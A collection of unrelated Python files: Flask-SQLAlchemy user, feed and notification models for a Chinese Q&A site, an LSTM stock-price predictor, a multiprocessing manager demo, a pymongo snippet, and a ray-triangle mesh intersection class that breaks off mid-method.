last_read_user_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览用户类消息的时间
last_read_thanks_notifications_at = db.Column(db.DateTime, default=datetime.now) # 最后浏览感谢类消息的时间
is_active = db.Column(db.Boolean, default=False)
is_admin = db.Column(db.Boolean, default=False)
has_selected_expert_topics = db.Column(db.Boolean, default=False) # 是否选择了擅长话题
has_selected_interesting_topics = db.Column(db.Boolean, default=False) # 是否选择了感兴趣的话题
# 引导
has_finish_guide_steps = db.Column(db.Boolean, default=False) # 是否完成引导步骤
current_guide_step = db.Column(db.Integer, default=1) # 当前处于的引导步骤
# 计数
followers_count = db.Column(db.Integer, default=0)
followings_count = db.Column(db.Integer, default=0)
thanks_count = db.Column(db.Integer, default=0)
shares_count = db.Column(db.Integer, default=0)
upvotes_count = db.Column(db.Integer, default=0)
questions_count = db.Column(db.Integer, default=0)
answers_count = db.Column(db.Integer, default=0)
drafts_count = db.Column(db.Integer, default=0)
# 设置
# 邀请我回答
invite_message_from_all = db.Column(db.Boolean, default=True)
invite_message_via_notification = db.Column(db.Boolean, default=True)
invite_message_via_mail = db.Column(db.Boolean, default=True)
# 赞同/感谢了我的回答
upvote_answer_message_from_all = db.Column(db.Boolean, default=True)
upvote_answer_message_via_notification = db.Column(db.Boolean, default=True)
upvote_answer_message_via_mail = db.Column(db.Boolean, default=True)
# 赞了我的评论
like_comment_message_from_all = db.Column(db.Boolean, default=True)
like_comment_message_via_notification = db.Column(db.Boolean, default=True)
like_comment_message_via_mail = db.Column(db.Boolean, default=True)
# 关注了我
follow_message_from_all = db.Column(db.Boolean, default=True)
follow_message_via_notification = db.Column(db.Boolean, default=True)
follow_message_via_mail = db.Column(db.Boolean, default=True)
# 评论了我
reply_comment_message_from_all = db.Column(db.Boolean, default=True)
reply_comment_message_via_notification = db.Column(db.Boolean, default=True)
reply_comment_message_via_mail = db.Column(db.Boolean, default=True)
# 回答了关注的问题
answer_question_message_from_all = db.Column(db.Boolean, default=True)
answer_question_message_via_notification = db.Column(db.Boolean, default=True)
answer_question_message_via_mail = db.Column(db.Boolean, default=True)
# 每周精选
receive_weekly_digest_message = db.Column(db.Boolean, default=True)
# 不定期的新品/活动通知
receive_activity_message = db.Column(db.Boolean, default=True)
# 被搜索引擎搜索到时显示我的姓名
show_to_search_engine = db.Column(db.Boolean, default=True)
def __setattr__(self, name, value):
# Hash password when set it.
if name == 'password':
value = generate_password_hash(value)
elif name == 'name':
# 为name赋值时,自动设置其拼音
super(User, self).__setattr__('name_pinyin', pinyin(value))
super(User, self).__setattr__(name, value)
def check_password(self, password):
return check_password_hash(self.password, password)
def followed_by_user(self, user_id):
"""该用户是否被当前用户关注"""
return FollowUser.query.filter(FollowUser.follower_id == user_id,
FollowUser.following_id == self.id).count() > 0
def blocked_by_user(self, user_id):
"""该用户是否被当前用户屏蔽"""
return BlockUser.query.filter(BlockUser.blocked_user_id == self.id,
BlockUser.user_id == user_id).count() > 0
@property
def profile_url(self):
"""用户个人主页url"""
if self.url_token:
return '%s/people/%s' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d' % (db.config.get('DC_DOMAIN'), self.id)
@property
def qa_url(self):
"""用户问答url"""
if self.url_token:
return '%s/people/%s/qa' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d/qa' % (db.config.get('DC_DOMAIN'), self.id)
@property
def achievements_url(self):
"""用户成就url"""
if self.url_token:
return '%s/people/%s/achievements' % (db.config.get('DC_DOMAIN'), self.url_token)
else:
return '%s/people/%d/achievements' % (db.config.get('DC_DOMAIN'), self.id)
@property
def avatar_url(self):
"""用户头像"""
return "%s/%s?imageView2/1/w/240" % (db.config.get('CDN_HOST'), self.avatar)
@property
def background_url(self):
"""背景图片"""
return "%s/%s" % (db.config.get('CDN_HOST'), self.background) if self.background else None
@property
def random_answers(self, count=3):
"""随机回答"""
from .answer import Answer
return self.answers.filter(~Answer.hide).order_by(db.func.random()).limit(count)
@property
def expert_topics(self):
"""用户擅长话题
当该用户未选择擅长话题时,返回score最高的话题;
当已选择时,返回选择的擅长话题。
"""
from .topic import UserTopicStatistic
if self.has_selected_expert_topics:
return UserTopicStatistic.query. \
filter(UserTopicStatistic.user_id == self.id,
UserTopicStatistic.selected). \
order_by(UserTopicStatistic.show_order.asc()).limit(8)
else:
return UserTopicStatistic.query. \
filter(UserTopicStatistic.user_id == self.id). \
filter(db.or_(UserTopicStatistic.score != 0, UserTopicStatistic.worked_on)). \
order_by(UserTopicStatistic.worked_on.desc()).order_by(UserTopicStatistic.score.asc()). \
limit(7)
def answered_topics(self, count=3):
"""该用户回答过的话题"""
from .topic import UserTopicStatistic
return UserTopicStatistic.query.filter(UserTopicStatistic.user_id == self.id,
UserTopicStatistic.score != 0). \
order_by(UserTopicStatistic.score.desc()).limit(count)
def save_to_es(self):
"""保存此用户到elasticsearch"""
return save_object_to_es('user', self.id, {
'name': self.name,
'name_pinyin': self.name_pinyin,
'desc': self.desc,
'created_at': self.created_at
})
def delete_from_es(self):
"""从elasticsearch中删除此用户"""
return delete_object_from_es('user', self.id)
@staticmethod
def query_from_es(q, page=1, per_page=10):
"""在elasticsearch中查询用户"""
results = search_objects_from_es(doc_type='user', body={
"query": {
"multi_match": {
"query": q,
"fields": ["name", "name_pinyin", "desc"]
}
},
"highlight": {
"fields": {
"name": {},
"desc": {}
}
},
"from": per_page * (page - 1),
"size": per_page
})
result_users = []
for result in results["hits"]["hits"]:
id = result["_id"]
user = User.query.get(id)
if "highlight" in result:
if "name" in result["highlight"]:
user.highlight_name = result["highlight"]["name"][0]
if "desc" in result["highlight"]:
user.highlight_desc = result["highlight"]["desc"][0]
result_users.append(user)
return result_users, results["hits"]["total"], results['took']
def __repr__(self):
return '<User %s>' % self.name
class FollowUser(db.Model):
"""关注用户"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
created_at = db.Column(db.DateTime, default=datetime.now)
follower_id = db.Column(db.Integer, db.ForeignKey('user.id'))
follower = db.relationship('User', backref=db.backref('followings',
lazy='dynamic',
order_by='desc(FollowUser.created_at)'),
foreign_keys=[follower_id])
following_id = db.Column(db.Integer, db.ForeignKey('user.id'))
following = db.relationship('User', backref=db.backref('followers',
lazy='dynamic',
order_by='desc(FollowUser.created_at)'),
foreign_keys=[following_id])
def __repr__(self):
return '<FollowUser %s>' % self.id
class USER_FEED_KIND(object):
"""用户feed类型
当出现重复行为时(3-6条),仅更新创建时间。
"""
ASK_QUESTION = "gN02m2F" # 提问
ANSWER_QUESTION = "J8AbTDT" # 回答问题
UPVOTE_ANSWER = "F9FqDKa" # 赞同回答
FOLLOW_QUESTION = "4MYN2Ui" # 关注问题
FOLLOW_TOPIC = "wa3PMng" # 关注话题
FOLLOW_USER = "vTw5er5" # 关注人
class UserFeed(db.Model):
"""用户feed"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(50))
created_at = db.Column(db.DateTime, default=datetime.now)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User',
backref=db.backref('feeds',
lazy='dynamic',
order_by='desc(UserFeed.created_at)'),
foreign_keys=[user_id])
topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
topic = db.relationship('Topic')
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
question = db.relationship('Question')
answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
answer = db.relationship('Answer')
following_id = db.Column(db.Integer, db.ForeignKey('user.id'))
following = db.relationship('User', foreign_keys=[following_id])
@staticmethod
def follow_topic(user, topic):
"""关注话题feed"""
user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_TOPIC,
UserFeed.topic_id == topic.id).first()
if user_feed:
user_feed.created_at = datetime.now()
else:
user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_TOPIC, user_id=user.id, topic_id=topic.id)
db.session.add(user_feed)
@staticmethod
def follow_user(follower, following):
"""关注用户feed"""
user_feed = follower.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_USER,
UserFeed.following_id == following.id).first()
if user_feed:
user_feed.created_at = datetime.now()
else:
user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_USER, user_id=follower.id, following_id=following.id)
db.session.add(user_feed)
@staticmethod
def follow_question(user, question):
"""关注问题feed"""
user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.FOLLOW_QUESTION,
UserFeed.question_id == question.id).first()
if user_feed:
user_feed.created_at = datetime.now()
else:
user_feed = UserFeed(kind=USER_FEED_KIND.FOLLOW_QUESTION, user_id=user.id, question_id=question.id)
db.session.add(user_feed)
@staticmethod
def upvote_answer(user, answer):
"""赞同回答feed"""
user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.UPVOTE_ANSWER,
UserFeed.answer_id == answer.id).first()
if user_feed:
user_feed.created_at = datetime.now()
else:
user_feed = UserFeed(kind=USER_FEED_KIND.UPVOTE_ANSWER, user_id=user.id, answer_id=answer.id)
db.session.add(user_feed)
@staticmethod
def ask_question(user, question):
"""提问feed"""
user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.ASK_QUESTION,
UserFeed.question_id == question.id).first()
if not user_feed:
user_feed = UserFeed(kind=USER_FEED_KIND.ASK_QUESTION, user_id=user.id, question_id=question.id)
db.session.add(user_feed)
@staticmethod
def answer_question(user, answer):
"""回答feed"""
user_feed = user.feeds.filter(UserFeed.kind == USER_FEED_KIND.ANSWER_QUESTION,
UserFeed.answer_id == answer.id).first()
if not user_feed:
user_feed = UserFeed(kind=USER_FEED_KIND.ANSWER_QUESTION, user_id=user.id, answer_id=answer.id)
db.session.add(user_feed)
class NOTIFICATION_KIND(object):
"""用户通知子类型"""
# 用户类通知
FOLLOW_ME = "nK8BQ99" # 关注了我
# 感谢类通知
UPVOTE_ANSWER = "Vu69o4V" # 赞同了我的回答
THANK_ANSWER = "gIWr7dg" # 感谢了我的回答
LIKE_ANSWER_COMMENT = "1oY78lq" # 赞了我的评论
# 消息类通知
ANSWER_FROM_ASKED_QUESTION = "WFHhwmW" # 回答了我提出的问题
COMMENT_ANSWER = "Fk3cIIH" # 评论了我的回答
REPLY_ANSWER_COMMENT = "ibWxLaC" # 回复了我的评论
GOOD_ANSWER_FROM_FOLLOWED_TOPIC = "FAKeWIP" # 关注的问题有了精彩的回答(后台)
SYSTEM_NOTI = "ezjwiCu" # 系统通知(后台)
HIDE_ANSWER = "E0CzTCk" # 回答被折叠(后台)
class NOTIFICATION_KIND_TYPE(object):
"""用户通知主类型"""
# 消息类
MESSAGE = [NOTIFICATION_KIND.ANSWER_FROM_ASKED_QUESTION,
NOTIFICATION_KIND.COMMENT_ANSWER,
NOTIFICATION_KIND.REPLY_ANSWER_COMMENT,
NOTIFICATION_KIND.GOOD_ANSWER_FROM_FOLLOWED_TOPIC,
NOTIFICATION_KIND.SYSTEM_NOTI,
NOTIFICATION_KIND.HIDE_ANSWER]
USER = [NOTIFICATION_KIND.FOLLOW_ME]
THANKS = [NOTIFICATION_KIND.UPVOTE_ANSWER,
NOTIFICATION_KIND.THANK_ANSWER,
NOTIFICATION_KIND.LIKE_ANSWER_COMMENT]
class Notification(db.Model):
"""用户消息"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(50))
created_at = db.Column(db.DateTime, default=datetime.now)
created_at_date = db.Column(db.Date, default=date.today())
unread = db.Column(db.Boolean, default=True)
# 消息接收者
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User',
backref=db.backref('notifications',
lazy='dynamic',
order_by='desc(Notification.created_at)'),
foreign_keys=[user_id])
# 消息发起者,为用户 id 的列表
senders_list = db.Column(db.Text)
merged = db.Column(db.Boolean, default=False) # 是否为合并过的消息
sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
sender = db.relationship('User', foreign_keys=[sender_id])
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
question = db.relationship('Question')
answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
answer = db.relationship('Answer')
answer_comment_id = db.Column(db.Integer, db.ForeignKey('answer_comment.id'))
answer_comment = db.relationship('AnswerComment')
def last_in_that_day(self, user_id):
"""该问题是否为当天最晚的消息"""
day = self.created_at.date()
noti = Notification.query. \
filter(db.func.date(Notification.created_at) == day,
Notification.user_id == user_id). \
order_by(Notification.created_at.desc()).first()
return noti is not None and noti.id == self.id
def add_sender(self, sender_id):
"""添加发起者"""
senders_list = set(json.loads(self.senders_list or "[]"))
senders_list.add(sender_id)
self.senders_list = json.dumps(list(senders_list))
@property
def senders(self):
"""该消息的全部发起者"""
if not self.senders_list:
return None
senders_id_list = json.loads(self.senders_list)
return User.query.filter(User.id.in_(senders_id_list))
@staticmethod
def follow_me(follower, following):
"""关注了我NOTI"""
noti = following.notifications.filter(
Notification.kind == NOTIFICATION_KIND.FOLLOW_ME,
Notification.sender_id == follower.id).first()
if not noti:
noti = Notification(kind=NOTIFICATION_KIND.FOLLOW_ME, sender_id=follower.id)
following.notifications.append(noti)
db.session.add(following)
@staticmethod
def upvote_answer(user, answer):
"""赞同回答NOTI"""
noti = answer.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.UPVOTE_ANSWER,
Notification.sender_id == user.id,
~Notification.merged,
Notification.answer_id == answer.id).first()
if noti:
return
noti = Notification(kind=NOTIFICATION_KIND.UPVOTE_ANSWER, sender_id=user.id, answer_id=answer.id,
user_id=answer.user.id, unread=False)
db.session.add(noti)
# 合并NOTI
merged_noti = answer.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.UPVOTE_ANSWER,
Notification.unread,
Notification.merged,
Notification.answer_id == answer.id,
Notification.created_at_date == date.today()).first()
if merged_noti:
merged_noti.add_sender(user.id)
db.session.add(merged_noti)
else:
merged_noti = Notification(kind=NOTIFICATION_KIND.UPVOTE_ANSWER, senders_list=json.dumps([user.id]),
answer_id=answer.id, merged=True, user_id=answer.user.id)
db.session.add(merged_noti)
@staticmethod
def thank_answer(user, answer):
"""感谢回答NOTI"""
noti = answer.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.THANK_ANSWER,
Notification.sender_id == user.id,
~Notification.merged,
Notification.answer_id == answer.id).first()
if noti:
return
noti = Notification(kind=NOTIFICATION_KIND.THANK_ANSWER, sender_id=user.id, answer_id=answer.id,
user_id=answer.user.id, unread=False)
db.session.add(noti)
# 合并NOTI
merged_noti = answer.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.THANK_ANSWER,
Notification.unread,
Notification.merged,
Notification.answer_id == answer.id,
Notification.created_at_date == date.today()).first()
if merged_noti:
merged_noti.add_sender(user.id)
db.session.add(merged_noti)
else:
merged_noti = Notification(kind=NOTIFICATION_KIND.THANK_ANSWER, senders_list=json.dumps([user.id]),
answer_id=answer.id, merged=True, user_id=answer.user.id)
db.session.add(merged_noti)
@staticmethod
def like_answer_comment(user, answer_comment):
"""赞回答评论NOTI"""
noti = answer_comment.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.LIKE_ANSWER_COMMENT,
Notification.sender_id == user.id,
~Notification.merged,
Notification.answer_comment_id == answer_comment.id).first()
if noti:
return
noti = Notification(kind=NOTIFICATION_KIND.LIKE_ANSWER_COMMENT, sender_id=user.id,
answer_comment_id=answer_comment.id, user_id=answer_comment.user.id, unread=False)
db.session.add(noti)
# 合并NOTI
merged_noti = answer_comment.user.notifications.filter(
Notification.kind == NOTIFICATION_KIND.LIKE_ANSWER_COMMENT,
Notification.unread,
Notification.merged,
Notification.answer_comment_id == answer_comment.id,
Notification.created_at_date == date.today()).first()
if merged_noti:
merged_noti.add_sender(user.id)
db.session.add(merged_noti)
else:
merged_noti = Notification(kind=NOTIFICATION_KIND.LIKE_ANSWER_COMMENT, senders_list=json.dumps([user.id]),
answer_comment_id=answer_comment.id, merged=True, user_id=answer_comment.user.id)
db.session.add(merged_noti)
@staticmethod
def answer_from_asked_question(user, answer):
"""回答问题NOTI"""
noti = Notification(kind=NOTIFICATION_KIND.ANSWER_FROM_ASKED_QUESTION, sender_id=user.id,
answer_id=answer.id, user_id=answer.question.user_id)
db.session.add(noti)
@staticmethod
def comment_answer(user, answer_comment):
"""评论回答NOTI"""
noti = Notification(kind=NOTIFICATION_KIND.COMMENT_ANSWER, sender_id=user.id,
answer_comment_id=answer_comment.id, user_id=answer_comment.answer.user_id)
db.session.add(noti)
@staticmethod
def reply_answer_comment(user, answer_comment):
"""回复评论NOTI"""
noti = Notification(kind=NOTIFICATION_KIND.REPLY_ANSWER_COMMENT, sender_id=user.id,
answer_comment_id=answer_comment.id, user_id=answer_comment.parent.user_id)
db.session.add(noti)
class HOME_FEED_KIND(object):
"""首页feed类型"""
FOLLOWING_UPVOTE_ANSWER = "UdW38Gw" # 我关注的人赞同某个回答
FOLLOWING_ASK_QUESTION = "groYn17" # 我关注的人提出了某个问题
FOLLOWING_ANSWER_QUESTION = "wFyvyTI" # 我关注的人回答了某个问题
FOLLOWING_FOLLOW_QUESTION = "i1VEDr8" # 我关注的人关注了某个问题
FANTASTIC_ANSWER_FROM_FOLLOWED_TOPIC = "HVKEV0N" # 关注的话题下的精彩回答
class HomeFeed(db.Model):
"""登录用户的首页feed"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(50))
created_at = db.Column(db.DateTime, default=datetime.now)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User',
backref=db.backref('home_feeds',
lazy='dynamic',
order_by='desc(HomeFeed.created_at)'),
foreign_keys=[user_id])
sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
sender = db.relationship('User', foreign_keys=[sender_id])
topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
topic = db.relationship('Topic')
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
question = db.relationship('Question')
answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
answer = db.relationship('Answer')
@staticmethod
def following_upvote_answer(user, sender, answer):
"""关注的人赞同回答feed"""
home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_UPVOTE_ANSWER,
HomeFeed.sender_id == sender.id,
HomeFeed.answer_id == answer.id).first()
if not home_feed:
home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_UPVOTE_ANSWER,
user_id=user.id, sender_id=sender.id, answer_id=answer.id)
db.session.add(home_feed)
@staticmethod
def following_ask_question(user, sender, question):
"""关注的人提出了问题feed"""
home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_ASK_QUESTION,
HomeFeed.sender_id == sender.id,
HomeFeed.question_id == question.id).first()
if not home_feed:
home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_ASK_QUESTION,
user_id=user.id, sender_id=sender.id, question_id=question.id)
db.session.add(home_feed)
@staticmethod
def following_answer_question(user, sender, answer):
"""关注的人回答问题feed"""
home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_ANSWER_QUESTION,
HomeFeed.sender_id == sender.id,
HomeFeed.answer_id == answer.id).first()
if not home_feed:
home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_ANSWER_QUESTION,
user_id=user.id, sender_id=sender.id, answer_id=answer.id)
db.session.add(home_feed)
@staticmethod
def following_follow_question(user, sender, question):
"""关注的人关注了问题feed"""
home_feed = user.home_feeds.filter(HomeFeed.kind == HOME_FEED_KIND.FOLLOWING_FOLLOW_QUESTION,
HomeFeed.sender_id == sender.id,
HomeFeed.question_id == question.id).first()
if not home_feed:
home_feed = HomeFeed(kind=HOME_FEED_KIND.FOLLOWING_FOLLOW_QUESTION,
user_id=user.id, sender_id=sender.id, question_id=question.id)
db.session.add(home_feed)
class HomeFeedBackup(db.Model):
"""首页 FEED 备份,用于当新用户注册并关注用户后,为其首页 FEED 填充内容"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(50))
created_at = db.Column(db.DateTime, default=datetime.now)
sender_id = db.Column(db.Integer, db.ForeignKey('user.id'))
sender = db.relationship('User', foreign_keys=[sender_id])
topic_id = db.Column(db.Integer, db.ForeignKey('topic.id'))
topic = db.relationship('Topic')
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
question = db.relationship('Question')
answer_id = db.Column(db.Integer, db.ForeignKey('answer.id'))
answer = db.relationship('Answer')
class COMPOSE_FEED_KIND(object):
"""撰写feed类型"""
INVITE_TO_ANSWER = "kdcKRfi" # 别人邀请我回答的问题
WAITING_FOR_ANSWER_QUESTION_FROM_EXPERT_TOPIC = "v0KJCX3" # 我擅长的话题下的待回答问题
WAITING_FOR_ANSWER_QUESTION_FROM_ALL = "4Q8wfm9" # 全站热门的待回答问题(偶尔)
WAITING_FOR_ANSWER_QUESTION_FROM_ANSWERED_TOPIC = "JlPzjXf" # 我没有写进擅长话题,但我之前有过回答的话题下的热门待回答问题
class ComposeFeed(db.Model):
"""撰写feed"""
__bind_key__ = 'dc'
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(50))
ignore = db.Column(db.Boolean, default=False) # 忽略
answered = db.Column(db.Boolean, default=False)
unread = db.Column(db.Boolean, default=True)
created_at = db.Column(db.DateTime, default=datetime.now)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User',
backref=db.backref('compose_feeds',
lazy='dynamic',
order_by='desc(ComposeFeed.created_at)'))
question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
question = db.relationship('Question')
invitation_id = db.Column(db.Integer, db.ForeignKey('invite_answer.id'))
invitation = db.relationship('InviteAnswer')
@staticmethod
def invite_to_answer(user, question, invitation):
"""邀请回答feed"""
compose_feed = user.compose_feeds.filter(ComposeFeed.kind == COMPOSE_FEED_KIND.INVITE_TO_ANSWER,
ComposeFeed.question_id == question.id,
ComposeFeed.invitation_id == invitation.id).first()
if not compose_feed:
compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.INVITE_TO_ANSWER, user_id=user.id,
question_id=question.id, invitation_id=invitation.id)
db.session.add(compose_feed)
@staticmethod
def waiting_for_answer_question_from_expert_topic(user, question):
"""擅长话题下的待回答问题feed"""
compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
if not compose_feed:
compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_EXPERT_TOPIC,
user_id=user.id, question_id=question.id)
db.session.add(compose_feed)
@staticmethod
def waiting_for_answer_question_from_all(user, question):
"""全站热门的待回答问题feed"""
compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
if not compose_feed:
compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_ALL,
user_id=user.id, question_id=question.id)
db.session.add(compose_feed)
@staticmethod
def waiting_for_answer_question_from_answered_topic(user, question):
"""我没有写进擅长话题,但我之前有过回答的话题下的热门待回答问题feed"""
compose_feed = user.compose_feeds.filter(ComposeFeed.question_id == question.id).first()
if not compose_feed:
compose_feed = ComposeFeed(kind=COMPOSE_FEED_KIND.WAITING_FOR_ANSWER_QUESTION_FROM_ANSWERED_TOPIC,
user_id=user.id, question_id=question.id)
db.session.add(compose_feed)
|
#Import the necessary data science libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import LSTM
from tensorflow.keras.layers import Dropout
from sklearn.preprocessing import MinMaxScaler
from matplotlib.pylab import rcParams
rcParams['figure.figsize']=20,10
df=pd.read_csv("NSE-TATA.csv")
df.head()
df["Date"]=pd.to_datetime(df.Date,format="%Y-%m-%d")
df.index=df['Date']
plt.figure(figsize=(16,8))
plt.plot(df["Close"],label='Close Price history')
data=df.sort_index(ascending=True,axis=0)
new_dataset=pd.DataFrame(index=range(0,len(df)),columns=['Date','Close'])
for i in range(0,len(data)):
new_dataset["Date"][i]=data["Date"][i]
new_dataset["Close"][i]=data["Close"][i]
scaler = MinMaxScaler(feature_range=(0, 1))
new_dataset.index = new_dataset.Date
new_dataset.drop("Date", axis=1, inplace=True)
final_dataset = new_dataset.values
train_data = final_dataset[0:987, :]
valid_data = final_dataset[987:, :]
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(final_dataset)
x_train_data, y_train_data = [], []
for i in range(60, len(train_data)):
x_train_data.append(scaled_data[i - 60:i, 0])
y_train_data.append(scaled_data[i, 0])
x_train_data, y_train_data = np.array(x_train_data), np.array(y_train_data)
x_train_data = np.reshape(x_train_data, (x_train_data.shape[0], x_train_data.shape[1], 1))
#Initializing our recurrent neural network
rnn = Sequential()
#Adding our first LSTM layer
rnn.add(LSTM(units = 45, return_sequences = True, input_shape = (x_train_data.shape[1], 1)))
#Perform some dropout regularization
rnn.add(Dropout(0.2))
#Adding three more LSTM layers with dropout regularization
for i in [True, True, False]:
rnn.add(LSTM(units = 45, return_sequences = i))
rnn.add(Dropout(0.2))
#Adding our output layer
rnn.add(Dense(units = 1))
#Compiling the recurrent neural network
rnn.compile(optimizer = 'adam', loss = 'mean_squared_error')
#Training the recurrent neural network
rnn.fit(x_train_data, y_train_data, epochs = 100, batch_size = 32)
inputs_data=new_dataset[len(new_dataset)-len(valid_data)-60:].values
inputs_data=inputs_data.reshape(-1,1)
inputs_data=scaler.transform(inputs_data)
X_test=[]
for i in range(60,inputs_data.shape[0]):
X_test.append(inputs_data[i-60:i,0])
X_test=np.array(X_test)
X_test=np.reshape(X_test,(X_test.shape[0],X_test.shape[1],1))
predicted_closing_price=rnn.predict(X_test)
predicted_closing_price=scaler.inverse_transform(predicted_closing_price)
rnn.save("model_RNN_Close.h5") |
from multiprocessing import Process, Value, Lock
import os
import time
from multiprocessing.managers import BaseManager
class User:
def __init__(self, name, salary):
self.name = name
self.money = Value('f', salary) # 进程共享变量
def increase(self):
self.money.value += 1000
time.sleep(1)
def __repr__(self): # 返回一个string格式的对象
return '{} money is {}'.format(self.name, self.money.value)
class MyManager(BaseManager):
# 自定义Manager
pass
# 向管理器中注册模型类的类型
MyManager.register("User", User)
def Manager(): # 定义创建Manager类对象的函数
m = MyManager()
m.start() # 注意: BaseManager对象必须要启动, 即 start()
return m
def f(user, lock):
with lock:
user.increase()
print(os.getpid(), '子进程', user)
if __name__ == '__main__':
manager = Manager() # 多进程间的数据管理器
user = manager.User('disen', 100) # 用manager对象直接对User进行管理
lock = Lock()
procs = [Process(target=f, args=(user, lock)) for i in range(5)]
# 五个进程直接一起搞f函数,就传进去一个user = manager.User('disen', 100)对象和进程锁lock
for proc in procs:
proc.start()
for proc in procs:
proc.join()
print('主进程', os.getpid(), user)
|
from pymongo import MongoClient
import datetime
client = MongoClient('localhost', 27017)
db = client['test-database']
collection = db['test-collection']
post = {"author": "Mike",
"text": "My first blog post!",
"tags": ["mongodb", "python", "pymongo"],
"date": datetime.datetime.utcnow()}
posts = db["posts"] |
import platform
from ..base import Ray, Vector3
from ..macros import create_assembler
from .hit import HitPoint
from .shape import Shape
from .grid_mesh import GridMesh
from .ray_triangle import ray_triangle_intersection
class BaseMesh(Shape):
def ntriangles(self):
raise NotImplementedError()
def bbox_triangle(self, idx):
raise NotImplementedError()
def isect_triangles(self, ray, triangles, min_dist=999999.0):
hit_point = False
for idx in triangles:
hit = self.ray_triangle(ray, idx, min_dist)
if hit is False: continue
if hit.t < min_dist:
min_dist = hit.t
hit_point = hit
return hit_point
def get_point(self, idx):
raise NotImplementedError()
def get_normal(self, idx):
raise NotImplementedError()
def get_indices(self, idx):
raise NotImplementedError()
def get_uv(self, idx):
raise NotImplementedError()
@classmethod
def has_normals(cls):
raise NotImplementedError()
@classmethod
def has_uv(cls):
raise NotImplementedError()
def ray_triangle(self, ray, idx, min_dist = 999999.0):
v0, v1, v2 = self.get_indices(idx)
p0 = self.get_point(v0)
p1 = self.get_point(v1)
p2 = self.get_point(v2)
a = p0[0] - p1[0]
b = p0[0] - p2[0]
c = ray.dir.x
d = p0[0] - ray.origin.x
e = p0[1] - p1[1]
f = p0[1] - p2[1]
g = ray.dir.y
h = p0[1] - ray.origin.y
i = p0[2] - p1[2]
j = p0[2] - p2[2]
k = ray.dir.z
l = p0[2] - ray.origin.z
m = f * k - g * j
n = h * k - g * l
p = f * l - h * j
q = g * i - e * k
s = e * j - f * i
temp3 = (a * m + b * q + c * s)
if temp3 == 0.0: return False
inv_denom = 1.0 / temp3
e1 = d * m - b * n - c * p
beta = e1 * inv_denom
if beta < 0.0: return False
r = e * l - h * i
e2 = a * n + d * q + c * r
gamma = e2 * inv_denom
if gamma < 0.0: return False
if beta + gamma > 1.0: return False
e3 = a * p - b * r + d * s
t = e3 * inv_denom
if t < 0.0001: return False # self-intersection
hit_point = ray.origin + ray.dir * t
if self.has_normals():
n0 = self.get_normal(v0)
n1 = self.get_normal(v1)
n2 = self.get_normal(v2)
normal0 = Vector3(n0[0], n0[1], n0[2])
normal1 = Vector3(n1[0], n1[1], n1[2])
normal2 = Vector3(n2[0], n2[1], n2[2])
normal = normal0 * (1.0 - beta - gamma) + beta * normal1 + gamma * normal2
normal.normalize()
else:
normal0 = Vector3(p0[0], p0[1], p0[2])
normal1 = Vector3(p1[0], p1[1], p1[2])
normal2 = Vector3(p2[0], p2[1], p2[2])
normal = (normal1 - normal0).cross(normal2 - normal0)
normal.normalize()
u = v = 0.0
if self.has_uv():
uv0 = self.get_uv(v0)
uv1 = self.get_uv(v1)
uv2 = self.get_uv(v2)
